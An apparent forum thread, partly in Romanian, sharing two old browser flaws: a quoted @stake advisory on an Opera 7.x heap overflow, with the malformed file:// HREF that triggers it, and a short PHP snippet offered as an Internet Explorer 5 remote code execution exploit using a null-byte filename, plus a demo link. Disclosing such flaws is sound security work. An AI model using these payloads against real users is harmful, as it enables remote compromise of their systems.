Opera vulnerability ...

[Tyby]

E-te-te ca se intampla shi la case mai mici:

Advisory Name: Opera HREF escaped server name overflow
Release Date: 10/20/2003
Application: Opera 7.11, 7.20
Platform: Windows XP/2000 and GNU/Linux 2.4 tested, others
may be vulnerable
Severity: Remote code execution
Authors: Jesse Burns <jesse@atstake.com>
Vendor Status: Fixed in version 7.21
CVE Candidate: CAN-2003-0870
Reference: http://www.atstake.com/research/advisor ... 2003-1.txt


Overview:

The Opera browser exhibits a failure when rendering HTML. Certain
HREFs cause a buffer allocated on the heap to overflow. Arbitrary
bytes in the heap may be overwritten. This can result in the
compromise of systems running Opera. Opera's mail system seems to be
vulnerable also and recovery from reading an email is somewhat
difficult.

An attacker can send an email containing HTML to a user running the
Opera mail client and cause this overflow to occur when the HTML is
rendered. An owner of a web site can craft a malicious web page
containing the problematic HTML to cause an overflow on Opera
clients visiting the site.


Details:

Rendering HREFs with certain illegally escaped server names in the
URL will cause Opera to crash due to a buffer management problem.
Sometimes the crash is observed immediately, sometimes when the
browser is closed, presumably as the resources are being freed.

The escaped URLs are of the form:

<a href="file://server%%[many % characters]%%text" ></a>


Timeline:

09/29/2003 Opera contacted with details of issue
09/30/2003 Vendor responds that they have reproduced problem
10/15/2003 Vendor releases new version of program that includes a
fix
10/20/2003 Advisory released


Vendor Response:

Opera has release a new version of the software that is available
here:

http://www.opera.com/download/

The change log (http://www.opera.com/windows/changelogs/721/) notes
this fix as:

"Fixed a crash caused by illegally escaped server name"

There is no specific bulletin or warning to users that this release
contains security fixes.


Recommendation:

Upgrade to the 7.21 version of Opera browser for your platform.

Filter email to remove HTML. Run your web browser and mail client
as a low privileged user.

[Tyby]

IE remote code execution:

This code can execute any code remotely using IE - as you can see very simple.

// for IE 5, tested on default Windows 98SE installation
<?php
Header("Content-type: audio/midi");
Header("Content-Disposition: inline; filename=readme.txt%00code.exe");
readfile("code.exe");
?>
<noscript>

Here you have a demo:
http://r3b00t.tx.pl/iexec5.php

Can we expect more surprises like this one?

Shi asta e urat ... incercatzi linkul dat ... nu e nimic periculos ... daca sistemuleste vulnerabil, va va apare o fereastra cu Windows 98 Version etc .... daca nu, apare un dialog de download al unui program pe care daca il lansatzi - apare acelshi lucru: